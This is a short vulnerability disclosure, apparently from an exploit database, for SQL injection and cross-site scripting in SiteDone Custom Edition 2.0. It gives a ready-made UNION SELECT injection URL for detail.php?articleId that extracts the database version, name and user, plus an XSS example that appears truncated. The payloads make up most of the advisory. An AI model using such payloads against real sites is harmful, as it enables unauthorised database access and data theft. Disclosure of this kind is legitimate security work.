[~] SiteDone Custom Edition 2.0 SQL Injection & XSS Vulnerability [~] [~] http://www.sitedone.com [~] [~] [~] ----------------------------------------------------------------------------------------------- [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 18.03.2010 [~] [~] [~] http://security-sh3ll.blogspot.com [~] [~] ------------------------------------------------------------------------------------------------ [~] detail.php?articleId=SQL & XSS [~] [~] [~] Ex :- [~] [~] http://[site]/site/store/detail.php?articleId=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19-- [~] http://[site]/site/store/detail.php?articleId="> [~]-------------------------------------------------------------------------------------------------
Related Exploits
Trying to match OSVDBs (1): 63088Other Possible E-DB Search Terms: SiteDone Custom Edition 2.0, SiteDone Custom Edition
Date | D | V | Title | Author | No matches |
---|